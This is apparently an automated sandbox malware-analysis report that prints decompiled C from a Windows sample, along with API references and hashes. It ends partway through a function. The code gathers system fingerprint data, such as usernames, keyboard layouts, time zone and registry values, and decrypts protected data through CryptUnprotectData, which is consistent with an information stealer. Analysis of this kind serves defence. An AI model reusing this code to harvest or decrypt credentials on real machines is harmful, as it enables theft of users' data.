StrCmpCA.SHLWAPI(?,00414010), ref: 00409B96
StrCmpCA.SHLWAPI(?,00414014), ref: 00409BAC
FindNextFileA.KERNEL32(000000FF,?), ref: 00409D98
FindClose.KERNEL32(000000FF), ref: 00409DAD

Strings

%s\*.*, xrefs: 00409B4D

Memory Dump Source

Source File: 00000014.00000002.775614666.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000014.00000002.775658150.000000000042C000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_7CA1.jbxd

Similarity

API ID: Find$File$CloseFirstNextwsprintf
String ID: %s\*.*
API String ID: 180737720-1013718255
Opcode ID: 17cff671c5b088ba29cd1f939e027977487a5fc66f9f8793f0469572126c6735
Instruction ID: 40ddeea6463e79618606ce93b98e9b87413dcbde514457397972783d08c0d7b9
Opcode Fuzzy Hash: 17cff671c5b088ba29cd1f939e027977487a5fc66f9f8793f0469572126c6735
Instruction Fuzzy Hash: F4618DB2900108ABC714EFA4DC85EDB73BCBF48700F0485A9F60993151DB75EA94CFA9

Uniqueness

Uniqueness Score: -1.00%

Function 0040AE00, Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 81
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040AE00() {
				void* _v8;
				void _v524;
				int _v528;
				int _v532;
				void* _v536;
				signed int _v540;
				void* _t63;

				_v536 = RtlAllocateHeap(GetProcessHeap(), 0, 0x1f4);
				_v528 = 0;
				_v8 = 0;
				_v532 = GetKeyboardLayoutList(0, 0);
				_v8 = LocalAlloc(0x40, _v532 << 2);
				_v532 = GetKeyboardLayoutList(_v532, _v8);
				_v540 = 0;
				while(_v540 < _v532) {
					GetLocaleInfoA( *(_v8 + _v540 * 4) & 0x0000ffff, 2,  &_v524, 0x200);
					if(_v528 == 0) {
						wsprintfA(_v536, 0x414024,  &_v524);
						_t63 = _t63 + 0xc;
					} else {
						wsprintfA(_v536, "%s / %s", _v536,  &_v524);
						_t63 = _t63 + 0x10;
					}
					_v528 = _v528 + 1;
					memset( &_v524, 0, 0x200);
					_v540 = _v540 + 1;
				}
				if(_v8 != 0) {
					LocalFree(_v8);
				}
				return _v536;
			}

0x0040ae1d
0x0040ae23
0x0040ae2d
0x0040ae3e
0x0040ae56
0x0040ae6a
0x0040ae70
0x0040ae8b
0x0040aeb9
0x0040aec6
0x0040af00
0x0040af06
0x0040aec8
0x0040aee2
0x0040aee8
0x0040aee8
0x0040af12
0x0040af26
0x0040ae85
0x0040ae85
0x0040af35
0x0040af3b
0x0040af3b
0x0040af4a

APIs

GetProcessHeap.KERNEL32(00000000,000001F4), ref: 0040AE10
RtlAllocateHeap.NTDLL(00000000), ref: 0040AE17
GetKeyboardLayoutList.USER32(00000000,00000000), ref: 0040AE38
LocalAlloc.KERNEL32(00000040,?), ref: 0040AE50
GetKeyboardLayoutList.USER32(?,00000000), ref: 0040AE64
GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 0040AEB9
wsprintfA.USER32 ref: 0040AEE2
wsprintfA.USER32 ref: 0040AF00
memset.NTDLL ref: 0040AF26
LocalFree.KERNEL32(00000000), ref: 0040AF3B

Strings

%s / %s, xrefs: 0040AED6

Memory Dump Source

Source File: 00000014.00000002.775614666.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000014.00000002.775658150.000000000042C000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_7CA1.jbxd

Similarity

API ID: HeapKeyboardLayoutListLocalwsprintf$AllocAllocateFreeInfoLocaleProcessmemset
String ID: %s / %s
API String ID: 1833916909-2910687431
Opcode ID: 0f92bf5acf608854974982b1739cf72243a6d7f18833e1a36854ea9882f8a1ec
Instruction ID: eeb2f0a0621c424ab69100cade097cc135afe8712b6e6ced773cd8003e1ddd0d
Opcode Fuzzy Hash: 0f92bf5acf608854974982b1739cf72243a6d7f18833e1a36854ea9882f8a1ec
Instruction Fuzzy Hash: 48317CB098121CEBDB60DB54CD8DBE9B7B4FB54300F1086E5E509A6291C7745ED0CF9A

Uniqueness

Uniqueness Score: -1.00%

Function 00407470, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55
encryptionmemoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00407470(void* __ecx, char* _a4, void** _a8, char _a12) {
				int _v8;

				_v8 = 0;
				 *_a8 = 0;
				_t3 =  &_a12; // 0x407726
				 *( *_t3) = 0;
				_t4 =  &_a12; // 0x407726
				if(CryptStringToBinaryA(_a4, 0, 1, 0,  *_t4, 0, 0) != 0) {
					_t6 =  &_a12; // 0x407726
					 *_a8 = LocalAlloc(0x40,  *( *_t6));
					if( *_a8 != 0) {
						_t9 =  &_a12; // 0x407726
						_v8 = CryptStringToBinaryA(_a4, 0, 1,  *_a8,  *_t9, 0, 0);
						if(_v8 == 0) {
							 *_a8 = LocalFree( *_a8);
						}
					}
				}
				return _v8;
			}

0x00407474
0x0040747e
0x00407484
0x00407487
0x00407491
0x004074a7
0x004074a9
0x004074ba
0x004074c2
0x004074c8
0x004074e0
0x004074e7
0x004074f8
0x004074f8
0x004074e7
0x004074c2
0x00407500

APIs

CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,&w@,00000000,00000000), ref: 0040749F
LocalAlloc.KERNEL32(00000040,?,?,00407726,?,?), ref: 004074B1
CryptStringToBinaryA.CRYPT32(?,00000000,00000001,?,&w@,00000000,00000000), ref: 004074DA
LocalFree.KERNEL32(?,?,?,00407726,?,?), ref: 004074EF

Strings

&w@, xrefs: 00407484, 00407491, 004074A9, 004074C8, 00407494, 004074CB

Memory Dump Source

Source File: 00000014.00000002.775614666.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000014.00000002.775658150.000000000042C000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_7CA1.jbxd

Similarity

API ID: BinaryCryptLocalString$AllocFree
String ID: &w@
API String ID: 4291131564-3575860705
Opcode ID: 08b659a240ee31d0f212fcd460449a7e6ac96e7e70d3894c24358685cfddc9bf
Instruction ID: c39f37767852ac2ecb8cc561512dd45ccdd2e68df360e397a827ac1b88331437
Opcode Fuzzy Hash: 08b659a240ee31d0f212fcd460449a7e6ac96e7e70d3894c24358685cfddc9bf
Instruction Fuzzy Hash: 7011C0B4641208AFEB00CF64CC95FAA77B5FB89710F20C459F9199B3D0C7B5A940CB54

Uniqueness

Uniqueness Score: -1.00%

Function 0040AD40, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 32
memorytimeCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E0040AD40() {
				struct _TIME_ZONE_INFORMATION _v180;
				void* _v184;
				long _v188;

				_v184 = RtlAllocateHeap(GetProcessHeap(), 0, 0x104);
				_v188 = GetTimeZoneInformation( &_v180);
				if(_v188 != 0xffffffff) {
					asm("cdq");
					wsprintfA(_v184, "UTC%d",  ~(_v180.Bias) / 0x3c);
					return _v184;
				}
				return _v184;
			}

0x0040ad5d
0x0040ad70
0x0040ad7d
0x0040ad8f
0x0040ada4
0x00000000
0x0040adad
0x00000000

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 0040AD50
RtlAllocateHeap.NTDLL(00000000), ref: 0040AD57
GetTimeZoneInformation.KERNEL32(?), ref: 0040AD6A
wsprintfA.USER32 ref: 0040ADA4

Strings

UTC%d, xrefs: 0040AD98

Memory Dump Source

Source File: 00000014.00000002.775614666.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000014.00000002.775658150.000000000042C000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_7CA1.jbxd

Similarity

API ID: Heap$AllocateInformationProcessTimeZonewsprintf
String ID: UTC%d
API String ID: 3317088062-2723047788
Opcode ID: c1eaeb3e9eb05cc2c06cb84a2f343100f25f8727c1150393eb784ecd10d2e60d
Instruction ID: 6bb383849dc0d2738afe04011fc8d00bcf8755a75da2bcdf9aea4dbc95a6d17c
Opcode Fuzzy Hash: c1eaeb3e9eb05cc2c06cb84a2f343100f25f8727c1150393eb784ecd10d2e60d
Instruction Fuzzy Hash: D9F0F670904318DBDB209BA0DD49BE5737AAF04301F0041E1EA09A3291C7745E90CF47

Uniqueness

Uniqueness Score: -1.00%

Function 004077A0, Relevance: 7.6, APIs: 5, Instructions: 90stringencryptionCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(0040931D,00000001,?,00001FA0,00000000,00000000,?,00001FA0), ref: 004077EB
CryptStringToBinaryA.CRYPT32(0040931D,00000000), ref: 004077F6
lstrcat.KERNEL32(?,0041401A), ref: 004078B9
lstrcat.KERNEL32(?,0041401A), ref: 004078CD
lstrcat.KERNEL32(0041401A,0041401A), ref: 004078EE

Memory Dump Source

Source File: 00000014.00000002.775614666.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000014.00000002.775658150.000000000042C000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_7CA1.jbxd

Similarity

API ID: lstrcat$BinaryCryptStringlstrlen
String ID:
API String ID: 189259977-0
Opcode ID: 516e6448358f7b58bb84e67d9d16b3023418a82e33a7becf366805c1b7c308d2
Instruction ID: 30f07ec64d583e05a1b33d7b848fe3cd5425e9d6c421b14f2a106d9c5e4e8dd0
Opcode Fuzzy Hash: 516e6448358f7b58bb84e67d9d16b3023418a82e33a7becf366805c1b7c308d2
Instruction Fuzzy Hash: 42414075D042199BDB10DF90CD89BFEB7B8EF48744F1085BAE505A7280C7786A84CF9A

Uniqueness

Uniqueness Score: -1.00%

Function 00404830, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 49
encryptionCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E00404830(void* __ecx, void* __eflags, char* _a4) {
				int _v8;
				void _v20011;
				char _v20012;

				E004139B0(0x4e28, __ecx);
				_v20012 = 0;
				memset( &_v20011, 0, 0x4e1f);
				_v8 = 0;
				CryptStringToBinaryA(_a4, E0040B740( &_v8, _a4), 1, 0,  &_v8, 0, 0);
				if(CryptStringToBinaryA(_a4, E0040B740( &_v8, _a4), 1,  &_v20012,  &_v8, 0, 0) == 0) {
					return 0x418b78;
				}
				return  &_v20012;
			}

0x00404838
0x0040483d
0x00404852
0x0040485a
0x0040487e
0x004048ae
0x00000000
0x004048ba
0x00000000

APIs

memset.MSVCRT ref: 00404852
CryptStringToBinaryA.CRYPT32(00000000,00000000,00000000,006109A0), ref: 0040487E
CryptStringToBinaryA.CRYPT32(00000000,00000000,00000000,00000000,00000000), ref: 004048A6

Strings

UNK, xrefs: 004048BA

Memory Dump Source

Source File: 00000014.00000002.775614666.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000014.00000002.775658150.000000000042C000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_7CA1.jbxd

Similarity

API ID: BinaryCryptString$memset
String ID: UNK
API String ID: 1505698593-448974810
Opcode ID: 0302c2f55f6a7eb287019bb5278503ac1340180e62eed3cb738e234bc2e133be
Instruction ID: 67e6f1f926e8c7a0577fe417f9255aed609f7f29732bbe38cca2ef159a93475b
Opcode Fuzzy Hash: 0302c2f55f6a7eb287019bb5278503ac1340180e62eed3cb738e234bc2e133be
Instruction Fuzzy Hash: 150180F6A50208BAE710EA90CC46FDA736CAB44705F104569B704AB2C1DBF5AB8487AD

Uniqueness

Uniqueness Score: -1.00%

Function 00407510, Relevance: 4.5, APIs: 3, Instructions: 49
memoryencryptionCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00407510(intOrPtr _a4, char _a8, intOrPtr* _a12, long* _a16) {
				void* _v8;
				long _v12;
				intOrPtr _v16;
				char _v20;
				intOrPtr _v24;

				_v16 = _a4;
				_v20 = _a8;
				_v24 =  *0x41a91c( &_v20, 0, 0, 0, 0, 0,  &_v12);
				if(_v24 != 0) {
					 *_a16 = _v12;
					 *_a12 = LocalAlloc(0x40,  *_a16);
					if( *_a12 != 0) {
						E0040B6C0( *_a12, _v8,  *_a16);
					}
				}
				LocalFree(_v8);
				return _v24;
			}

0x00407519
0x0040751f
0x0040753a
0x00407541
0x00407549
0x0040755c
0x00407564
0x00407576
0x00407576
0x00407564
0x0040757f
0x0040758b

APIs

CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00407534
LocalAlloc.KERNEL32(00000040,00000000), ref: 00407553
LocalFree.KERNEL32(?), ref: 0040757F

Memory Dump Source

Source File: 00000014.00000002.775614666.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000014.00000002.775658150.000000000042C000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_7CA1.jbxd

Similarity

API ID: Local$AllocCryptDataFreeUnprotect
String ID:
API String ID: 2068576380-0
Opcode ID: b90efae16c500797bef48a79db51a3ce8e169ba8c9442b9772ed69811b9c1519
Instruction ID: 5588d120a004665a6ba361d23f784ce6a241c8210f3f123560cfb33f0262ac2e
Opcode Fuzzy Hash: b90efae16c500797bef48a79db51a3ce8e169ba8c9442b9772ed69811b9c1519
Instruction Fuzzy Hash: A711BAB4A01209EFCB04DF94D984EEE77B5FF88300F108569E915A7390D734AE51CB65

Uniqueness

Uniqueness Score: -1.00%

Function 0040ACA0, Relevance: 4.5, APIs: 3, Instructions: 19
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040ACA0() {
				long _v8;
				void* _v12;

				_v12 = RtlAllocateHeap(GetProcessHeap(), 0, 0x104);
				_v8 = 0x104;
				GetUserNameA(_v12,  &_v8);
				return _v12;
			}

0x0040acba
0x0040acbd
0x0040accc
0x0040acd8

APIs

GetProcessHeap.KERNEL32(00000000,00000104,00406B14,JohnDoe,?,00406B8D), ref: 0040ACAD
RtlAllocateHeap.NTDLL(00000000,?,00406B8D), ref: 0040ACB4
GetUserNameA.ADVAPI32(?,00000104), ref: 0040ACCC

Memory Dump Source

Source File: 00000014.00000002.775614666.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000014.00000002.775658150.000000000042C000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_7CA1.jbxd

Similarity

API ID: Heap$AllocateNameProcessUser
String ID:
API String ID: 1296208442-0
Opcode ID: e9dc6b98a5dfea62f6889e6a1ef584fcd877daf0bb91c9162e28492c9d990377
Instruction ID: d8f7b171ebd5a715f3e42bd651ca7b29b46524e3321307990960babfdc207423
Opcode Fuzzy Hash: e9dc6b98a5dfea62f6889e6a1ef584fcd877daf0bb91c9162e28492c9d990377
Instruction Fuzzy Hash: 68E08CB4901208BBCB00EFE4DE49ACDBBB8AB08302F0040A4EA04E3280D6755A94CB52

Uniqueness

Uniqueness Score: -1.00%

Function 00407190, Relevance: 1.6, APIs: 1, Instructions: 60
encryptionCOMMON

Download Yara Rule

C-Code - Quality: 25%

			E00407190(intOrPtr _a4, void* _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _v28;
				char _v32;

				_v8 = E0040B6A0(_a8);
				E0040B6C0(_v8, _a4, _a8);
				_v12 = _a4;
				_v16 = _a8;
				_v28 = E0040B6A0(_a8);
				_push( &_v24);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push( &_v16);
				if( *0x41a91c() == 0) {
					return 0;
				}
				_v32 = 0;
				while(_v32 < _v24) {
					 *((char*)(_v28 + _v32)) =  *((intOrPtr*)(_v20 + _v32));
					_v32 = _v32 + 1;
				}
				 *((char*)(_v28 + _v24)) = 0;
				return _v28;
			}

0x004071a2
0x004071b1
0x004071b9
0x004071bf
0x004071ce
0x004071d4
0x004071d5
0x004071d7
0x004071d9
0x004071db
0x004071dd
0x004071e2
0x004071eb
0x00000000
0x00407229
0x004071ed
0x004071ff
0x00407215
0x004071fc
0x004071fc
0x0040721f
0x00000000

APIs

Part of subcall function 0040B6A0: GetProcessHeap.KERNEL32(00000008,00413650,?,0040B59D,00413650,?,?,00413650,00004098), ref: 0040B6A9
Part of subcall function 0040B6A0: RtlAllocateHeap.NTDLL(00000000,?,0040B59D), ref: 0040B6B0

CryptUnprotectData.CRYPT32(00000003,00000000,00000000,00000000,00000000,00000000,?), ref: 004071E3

Memory Dump Source

Source File: 00000014.00000002.775614666.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000014.00000002.775658150.000000000042C000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_7CA1.jbxd

Similarity

API ID: Heap$AllocateCryptDataProcessUnprotect
String ID:
API String ID: 976466151-0
Opcode ID: eb6f61757d666350bd732e34e11297bcafa1fe30373c176f0f3feb6d61718744
Instruction ID: 8f8f6216897be9d8972c86f868d54cc82cdb6c08760e6d1e730d1f8a7c76b19d
Opcode Fuzzy Hash: eb6f61757d666350bd732e34e11297bcafa1fe30373c176f0f3feb6d61718744
Instruction Fuzzy Hash: 17116DB5D04109EBCF00CFD8D881AAFB7B4AF44304F108569E905AB341D338AA41CF9A

Uniqueness

Uniqueness Score: -1.00%

Function 004056E0, Relevance: 122.8, APIs: 64, Strings: 6, Instructions: 315stringmemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,000F423F,?,?,004067CA,?,?,?,?,?,00000104,?,00001388), ref: 004056EB
RtlAllocateHeap.NTDLL(00000000,?,004067CA), ref: 004056F2
lstrcat.KERNEL32(?,0060E518), ref: 00405705
lstrcat.KERNEL32(?,00622368), ref: 00405716
lstrcat.KERNEL32(?,00418BC0), ref: 00405725
lstrcat.KERNEL32(?,00610410), ref: 00405736
lstrcat.KERNEL32(?,00418BC4), ref: 00405745
lstrcat.KERNEL32(?,006257D0), ref: 00405756
lstrcat.KERNEL32(?,00418BC0), ref: 00405765
lstrcat.KERNEL32(?,006276F8), ref: 00405776
GetCurrentProcessId.KERNEL32(?,004067CA,?,?,?,?,?,00000104,?,00001388), ref: 0040577C

Part of subcall function 0040B950: OpenProcess.KERNEL32(00000410,00000000,004067CA), ref: 0040B964
Part of subcall function 0040B950: GetModuleFileNameExA.PSAPI(00000000,00000000,?,00000104), ref: 0040B985
Part of subcall function 0040B950: CloseHandle.KERNEL32(00000000), ref: 0040B98F

lstrcat.KERNEL32(?,00000000), ref: 00405790
lstrcat.KERNEL32(00418BC0,00418BC0), ref: 0040579F
lstrcat.KERNEL32(00627680,00627680), ref: 004057AF

Part of subcall function 0040ACE0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,?,004057BA,?,?,?,?,00000104,?,00001388), ref: 0040ACED
Part of subcall function 0040ACE0: RtlAllocateHeap.NTDLL(00000000), ref: 0040ACF4
Part of subcall function 0040ACE0: GetLocalTime.KERNEL32(?,?,?,?,?,?,004057BA,?,?,?,?,00000104,?,00001388), ref: 0040AD01
Part of subcall function 0040ACE0: wsprintfA.USER32 ref: 0040AD2E

lstrcat.KERNEL32(00000000,00000000), ref: 004057BF
lstrcat.KERNEL32(00418BC4,00418BC4), ref: 004057CE
lstrcat.KERNEL32(00627698,00627698), ref: 004057DF

Part of subcall function 0040AD40: GetProcessHeap.KERNEL32(00000000,00000104), ref: 0040AD50
Part of subcall function 0040AD40: RtlAllocateHeap.NTDLL(00000000), ref: 0040AD57
Part of subcall function 0040AD40: GetTimeZoneInformation.KERNEL32(?), ref: 0040AD6A

lstrcat.KERNEL32(00000000,00000000), ref: 004057EF
lstrcat.KERNEL32(00418BC0,00418BC0), ref: 004057FE
lstrcat.KERNEL32(006258F0,006258F0), ref: 0040580F

Part of subcall function 0040ADC0: GetUserDefaultLocaleName.KERNEL32(?,00000055), ref: 0040ADD2

lstrcat.KERNEL32(00000000,00000000), ref: 0040581F
lstrcat.KERNEL32(00418BC4,00418BC4), ref: 0040582E
lstrcat.KERNEL32(00625910,00625910), ref: 0040583E

Part of subcall function 0040AE00: GetProcessHeap.KERNEL32(00000000,000001F4), ref: 0040AE10
Part of subcall function 0040AE00: RtlAllocateHeap.NTDLL(00000000), ref: 0040AE17
Part of subcall function 0040AE00: GetKeyboardLayoutList.USER32(00000000,00000000), ref: 0040AE38
Part of subcall function 0040AE00: LocalAlloc.KERNEL32(00000040,?), ref: 0040AE50
Part of subcall function 0040AE00: GetKeyboardLayoutList.USER32(?,00000000), ref: 0040AE64
Part of subcall function 0040AE00: GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 0040AEB9
Part of subcall function 0040AE00: wsprintfA.USER32 ref: 0040AEE2
Part of subcall function 0040AE00: wsprintfA.USER32 ref: 0040AF00
Part of subcall function 0040AE00: memset.NTDLL ref: 0040AF26
Part of subcall function 0040AE00: LocalFree.KERNEL32(00000000), ref: 0040AF3B

lstrcat.KERNEL32(00000000,00000000), ref: 0040584E
lstrcat.KERNEL32(00418BC0,00418BC0), ref: 0040585D
lstrcat.KERNEL32(Xwb,00627758), ref: 0040586E

Part of subcall function 0040AF50: GetSystemPowerStatus.KERNEL32(?), ref: 0040AF5A

lstrcat.KERNEL32(00000000,00000000), ref: 0040587E
lstrcat.KERNEL32(00418BC4,00418BC4), ref: 0040588D
lstrcat.KERNEL32(00627800,00627800), ref: 0040589E

Part of subcall function 0040AF80: GetProcessHeap.KERNEL32(00000000,00000104), ref: 0040AF94
Part of subcall function 0040AF80: RtlAllocateHeap.NTDLL(00000000), ref: 0040AF9B
Part of subcall function 0040AF80: RegOpenKeyExA.ADVAPI32(80000002,006226A0,00000000,00020119,?), ref: 0040AFBB
Part of subcall function 0040AF80: RegQueryValueExA.ADVAPI32(?,00628C00,00000000,00000000,?,000000FF), ref: 0040AFDC
Part of subcall function 0040AF80: RegCloseKey.ADVAPI32(?), ref: 0040AFE6

lstrcat.KERNEL32(00000000,00000000), ref: 004058AE
lstrcat.KERNEL32(00418BC4,00418BC4), ref: 004058BD
lstrcat.KERNEL32(Xwb,00627728), ref: 004058CD

Part of subcall function 0040B000: GetProcessHeap.KERNEL32(00000000,00000104), ref: 0040B00D
Part of subcall function 0040B000: RtlAllocateHeap.NTDLL(00000000), ref: 0040B014
Part of subcall function 0040B000: memset.NTDLL ref: 0040B025
Part of subcall function 0040B000: GlobalMemoryStatusEx.KERNEL32(00000040), ref: 0040B036
Part of subcall function 0040B000: __aulldiv.LIBCMT ref: 0040B050
Part of subcall function 0040B000: wsprintfA.USER32 ref: 0040B07C

lstrcat.KERNEL32(00000000,00000000), ref: 004058DD
lstrcat.KERNEL32(00418BC4,00418BC4), ref: 004058EC
lstrcat.KERNEL32(00610420,00610420), ref: 004058FD

Part of subcall function 0040B090: GetProcessHeap.KERNEL32(00000000,00000104), ref: 0040B0A4
Part of subcall function 0040B090: RtlAllocateHeap.NTDLL(00000000), ref: 0040B0AB
Part of subcall function 0040B090: RegOpenKeyExA.ADVAPI32(80000002,0062A990,00000000,00020119,?), ref: 0040B0CB
Part of subcall function 0040B090: RegQueryValueExA.ADVAPI32(?,006295E8,00000000,00000000,?,000000FF), ref: 0040B0EC
Part of subcall function 0040B090: RegCloseKey.ADVAPI32(?), ref: 0040B0F6

lstrcat.KERNEL32(00000000,00000000), ref: 0040590D
lstrcat.KERNEL32(006265F0,006265F0), ref: 0040591E

Part of subcall function 0040B110: GetCurrentProcess.KERNEL32(00000000), ref: 0040B11F
Part of subcall function 0040B110: IsWow64Process.KERNEL32(00000000), ref: 0040B126

lstrcat.KERNEL32(00000000,00000000), ref: 0040592E
lstrcat.KERNEL32(00626600,00626600), ref: 0040593F
lstrcat.KERNEL32(00418BC4,00418BC4), ref: 0040594E
lstrcat.KERNEL32(006278D8,006278D8), ref: 0040595F
lstrcat.KERNEL32(00000000,00000000), ref: 0040596F
lstrcat.KERNEL32(00418BC4,00418BC4), ref: 0040597E
lstrcat.KERNEL32(006258B0,006258B0), ref: 0040598F

Part of subcall function 0040B180: wsprintfA.USER32 ref: 0040B1DC

lstrcat.KERNEL32(00000000,00000000), ref: 0040599F
lstrcat.KERNEL32(00418BC0,00418BC0), ref: 004059AE
lstrcat.KERNEL32(006278F0,006278F0), ref: 004059BE

Part of subcall function 0040AC50: GetProcessHeap.KERNEL32(00000000,00000104,?,00406B8D), ref: 0040AC5D
Part of subcall function 0040AC50: RtlAllocateHeap.NTDLL(00000000,?,00406B8D), ref: 0040AC64
Part of subcall function 0040AC50: GetComputerNameA.KERNEL32(00406B8D,00000104), ref: 0040AC7C

lstrcat.KERNEL32(00000000,00000000), ref: 004059CE
lstrcat.KERNEL32(00418BC4,00418BC4), ref: 004059DD
lstrcat.KERNEL32(Xwb,00627878), ref: 004059EE

Part of subcall function 0040ACA0: GetProcessHeap.KERNEL32(00000000,00000104,00406B14,JohnDoe,?,00406B8D), ref: 0040ACAD
Part of subcall function 0040ACA0: RtlAllocateHeap.NTDLL(00000000,?,00406B8D), ref: 0040ACB4
Part of subcall function 0040ACA0: GetUserNameA.ADVAPI32(?,00000104), ref: 0040ACCC

lstrcat.KERNEL32(00000000,00000000), ref: 004059FE
lstrcat.KERNEL32(00418BC4,00418BC4), ref: 00405A0D
lstrcat.KERNEL32(00627788,00627788), ref: 00405A1E
lstrcat.KERNEL32(00000000,00000000), ref: 00405A2E
lstrcat.KERNEL32(00418BC4,00418BC4), ref: 00405A3D
lstrcat.KERNEL32(006278A8,006278A8), ref: 00405A4D

Part of subcall function 0040B240: GetProcessHeap.KERNEL32(00000000,00000104), ref: 0040B254
Part of subcall function 0040B240: RtlAllocateHeap.NTDLL(00000000), ref: 0040B25B
Part of subcall function 0040B240: RegOpenKeyExA.ADVAPI32(80000002,00626EF8,00000000,00020119,?), ref: 0040B27B
Part of subcall function 0040B240: RegQueryValueExA.ADVAPI32(?,00629690,00000000,00000000,?,000000FF), ref: 0040B29C
Part of subcall function 0040B240: RegCloseKey.ADVAPI32(?), ref: 0040B2A6

lstrcat.KERNEL32(00000000,00000000), ref: 00405A5D
lstrcat.KERNEL32(00418BC4,00418BC4), ref: 00405A6C
lstrcat.KERNEL32(00626610,00626610), ref: 00405A7D

Part of subcall function 0040B2C0: GetCurrentHwProfileA.ADVAPI32(?), ref: 0040B2CD
Part of subcall function 0040B2C0: GetProcessHeap.KERNEL32(00000000,00000064), ref: 0040B2DB
Part of subcall function 0040B2C0: RtlAllocateHeap.NTDLL(00000000), ref: 0040B2E2
Part of subcall function 0040B2C0: memset.NTDLL ref: 0040B2F9
Part of subcall function 0040B2C0: lstrcat.KERNEL32(?,?), ref: 0040B30A

lstrcat.KERNEL32(00000000,00000000), ref: 00405A8D
lstrcat.KERNEL32(00418BC0,00418BC0), ref: 00405A9C
lstrcat.KERNEL32(Xwb,00625A70), ref: 00405AAD
lstrcat.KERNEL32(00418BC4,00418BC4), ref: 00405ABC

Part of subcall function 0040B330: RegOpenKeyExA.ADVAPI32(80000002,006235C8,00000000,00020019,00000000), ref: 0040B382

lstrlen.KERNEL32(?,?,?,?,?,?,?,00000104,?,00001388), ref: 00405AD2

Strings

Xwb, xrefs: 00405863
h#b, xrefs: 0040570B
xxb, xrefs: 004059E3
pZb, xrefs: 00405AA2
Xwb, xrefs: 0040586A, 004058C9, 004059EA, 00405AA9, 0040586D, 004058CC, 004059ED, 00405AAC
(wb, xrefs: 004058C3

Memory Dump Source

Source File: 00000014.00000002.775614666.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000014.00000002.775658150.000000000042C000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_7CA1.jbxd

Similarity

API ID: lstrcat$Heap$Process$Allocate$Openwsprintf$CloseName$CurrentLocalQueryValuememset$KeyboardLayoutListLocaleStatusTimeUser$AllocComputerDefaultFileFreeGlobalHandleInfoInformationMemoryModulePowerProfileSystemWow64Zone__aulldivlstrlen
String ID: (wb$Xwb$Xwb$h#b$pZb$xxb
API String ID: 1685704716-1595687263
Opcode ID: e218a5e356af2615d6aaa017568bf9cb7d31594a9bde99fdcaaeb157979fca9f
Instruction ID: 30c1e02cd9c5137cb8aca07fd8d84d5d1b54e9b10edc29ade13e80b98b9e1d91
Opcode Fuzzy Hash: e218a5e356af2615d6aaa017568bf9cb7d31594a9bde99fdcaaeb157979fca9f
Instruction Fuzzy Hash: 40C11BBA611504FFCB00DBE4DF89D9E77B9AF4C3457208569B205D3661CB3CAA20DB29

Uniqueness

Uniqueness Score: -1.00%

Function 00409060, Relevance: 63.2, APIs: 34, Strings: 2, Instructions: 236
stringfileCOMMON

Download Yara Rule

C-Code - Quality: 28%

			E00409060(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				long _v8;
				intOrPtr _v12;
				char* _v16;
				char _v284;
				char* _v288;
				void* _v292;
				char* _v296;
				struct _OVERLAPPED* _v300;
				long _v304;
				char* _v308;
				intOrPtr _t59;
				char* _t72;
				intOrPtr _t88;
				intOrPtr _t90;
				intOrPtr _t93;
				intOrPtr _t96;
				char* _t98;
				char* _t99;
				intOrPtr _t104;
				intOrPtr _t108;
				char* _t110;
				char* _t111;
				intOrPtr _t116;
				void* _t118;
				intOrPtr _t120;
				char* _t129;
				char* _t130;
				intOrPtr _t131;
				intOrPtr _t132;
				intOrPtr _t133;
				intOrPtr _t134;
				char* _t136;
				char* _t140;
				intOrPtr _t147;
				char* _t152;
				intOrPtr _t156;
				intOrPtr _t157;
				intOrPtr _t159;
